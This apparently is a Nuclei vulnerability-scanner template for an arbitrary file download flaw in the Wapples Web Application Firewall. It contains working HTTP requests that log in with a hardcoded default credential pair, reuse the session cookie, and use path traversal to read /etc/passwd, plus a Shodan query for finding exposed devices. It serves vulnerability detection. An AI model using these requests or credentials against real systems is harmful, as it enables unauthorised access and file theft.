id: wapples-firewall-lfi info: name: Wapples Web Application Firewall - Webapi Arbitrary File Download author: For3stCo1d severity: high reference: - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb metadata: verified: true shodan-query: http.title:"Intelligent WAPPLES" tags: wapples,firewall,lfi requests: - raw: - | POST /webapi/auth HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded id=systemi&password=db/wp.no1 - | GET /webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db_backup HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded cookie-reuse: true extractors: - type: regex name: cookie part: header internal: true group: 1 regex: - WP_SESSID=(.+?) matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200